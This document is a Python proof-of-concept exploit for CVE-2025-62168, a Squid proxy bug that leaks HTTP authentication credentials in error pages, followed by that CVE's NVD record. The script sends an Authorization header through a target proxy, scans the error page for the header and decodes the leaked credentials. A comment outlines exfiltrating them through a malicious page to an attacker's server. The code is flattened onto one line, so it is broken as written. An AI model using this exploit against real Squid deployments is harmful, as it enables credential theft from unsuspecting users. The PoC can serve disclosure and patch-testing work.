CVE-2025-62168

# CVE-2025-62168 PoC - Squid HTTP Authentication Credentials Disclosure # This PoC demonstrates how an attacker can extract HTTP authentication # credentials leaked through Squid's error pages. import requests import base64 # Target Squid proxy PROXY_URL = "http://target-squid-proxy:3128" # Step 1: Craft a request that will trigger Squid's error page # containing leaked authentication headers target_url = f"{PROXY_URL}/nonexistent-resource-that-triggers-error" # Step 2: Include Authorization header with victim's credentials # (In a real attack, the victim's browser would automatically include this) victim_credentials = base64.b64encode(b"admin:password123").decode() headers = { "Authorization": f"Basic {victim_credentials}", "User-Agent": "Mozilla/5.0 (compatible; AttackerBot/1.0)" } # Step 3: Send the request - Squid will return an error page # that includes the full request headers including Authorization try: response = requests.get(target_url, headers=headers, timeout=10) # Step 4: Extract leaked credentials from the error page if "Authorization" in response.text: print("[!] Vulnerability confirmed - Authorization header leaked!") # Parse the leaked authorization header for line in response.text.split("\n"): if "Authorization" in line: print(f"[+] Leaked header: {line.strip()}") # Extract and decode the credentials leaked_auth = line.split(":")[-1].strip() if "Basic" in leaked_auth: decoded = base64.b64decode(leaked_auth.split()[-1]) print(f"[+] Decoded credentials: {decoded.decode()}") else: print("[-] Authorization header not found in response") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Note: A real-world attack would use a malicious webpage that causes # the victim's browser to make requests through the Squid proxy, # then use JavaScript to read the error page content and exfiltrate # the credentials via the attacker's server.

{"cve": {"id": "CVE-2025-62168", "sourceIdentifier": "[email protected]", "published": "2025-10-17T17:15:49.037", "lastModified": "2025-11-05T17:15:45.087", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Squid is a caching proxy for the Web. In Squid versions prior to 7.2, a failure to redact HTTP authentication credentials in error handling allows information disclosure. The vulnerability allows a script to bypass browser security protections and learn the credentials a trusted client uses to authenticate. This potentially allows a remote client to identify security tokens or credentials used internally by a web application using Squid for backend load balancing. These attacks do not require Squid to be configured with HTTP authentication. The vulnerability is fixed in version 7.2. As a workaround, disable debug information in administrator mailto links generated by Squid by configuring squid.conf with email_err_data off."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-209"}, {"lang": "en", "value": "CWE-550"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:squid-cache:squid:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2", "matchCriteriaId": "77C03B70-0C3B-44B0-B44E-AC3C736A6D69"}]}]}], "references": [{"url": "https://github.com/squid-cache/squid/commit/0951a0681011dfca3d78c84fd7f1e19c78a4443f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/squid-cache/squid/security/advisories/GHSA-c8cc-phh7-xmxr", "source": "[email protected]", "tags": ["Mitigation", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/05/6", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}